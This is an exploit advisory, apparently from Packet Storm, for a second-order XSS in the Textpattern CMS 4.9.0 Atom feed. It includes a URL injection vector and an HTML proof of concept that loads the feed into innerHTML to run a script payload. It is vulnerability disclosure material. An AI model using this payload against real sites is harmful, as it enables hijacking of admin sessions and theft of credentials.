=============================================================================================================================================
| # Title     : Textpattern 4.9.0 Second-Order XSS via Atom Feed Injection                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
| # Vendor    : https://textpattern.com/                                                                                                    |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213262/

[+] Summary    : A Second-Order Cross-Site Scripting (XSS) vulnerability exists in Textpattern CMS version 4.9.0 due to improper sanitization and contextual encoding 
                 of user-supplied input embedded within Atom feed XML elements.
                 User-controlled parameters (such as category) are reflected into sensitive Atom fields including <id> and <link href> without proper XML escaping. 
				 While the injected payload does not execute directly in modern browsers (due to XML context), it executes when the feed is consumed 
				 by vulnerable HTML-based feed readers, admin dashboards, or CMS aggregators, resulting in JavaScript execution in a trusted context.
                 This vulnerability enables Supply-Chain XSS targeting administrative users and trusted systems.

[+] Affected Product

Product: Textpattern CMS

Version: 4.9.0

Component: Atom Feed Generator (/atom/)

Attack Surface: Feed consumers (Admin panels, RSS/Atom readers)

Vulnerability Type

Second-Order Cross-Site Scripting (XSS)

Feed Injection / Trusted Content Injection

CWE / CAPEC Classification

CWE-79: Improper Neutralization of Input During Web Page Generation

CWE-116: Improper Encoding or Escaping of Output

CAPEC-63: Cross-Site Scripting (Stored Injection)

[+] Technical Details :

The Atom feed endpoint reflects untrusted input directly into XML nodes:

<id>

<link href>

Example Injection Vector
/atom/?section=articles&category=meaningful-labor'"()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>

Resulting Atom Fragment
<id>
tag:release-demo.textpattern.co,2005:.../articles/meaningful-labor'"()&%<acx>
<ScRiPt>prompt(925482)</ScRiPt>
</id>

The payload is preserved without XML escaping, confirming an injection vulnerability.

Exploitation Scenario (Second-Order)

Attacker injects a malicious payload via Atom feed parameters.

Textpattern reflects the payload into the generated Atom XML.

An administrator or system consumes the feed using:

Admin feed preview panels

CMS importers

Custom dashboards

The feed content is inserted into the DOM using unsafe methods such as:

element.innerHTML = feedContent;

JavaScript payload executes in the context of the trusted application.

[+] PoC :

<!DOCTYPE html>
<html>
<body>
<div id="feed"></div>
<script>
fetch("https://127.0.0.1/release-demo.textpattern.co/atom/?section=articles&category=meaningful-labor'%22()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>")
.then(r => r.text())
.then(d => document.getElementById("feed").innerHTML = d);
</script>
</body>
</html>

[+] Result : prompt(925482)

Confirms execution
No false positives
Demonstrates second-order exploitation

[+] Impact :

Arbitrary JavaScript execution in trusted admin interfaces

Session hijacking

Credential theft

CSRF token extraction

Supply-chain compromise via trusted feeds

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================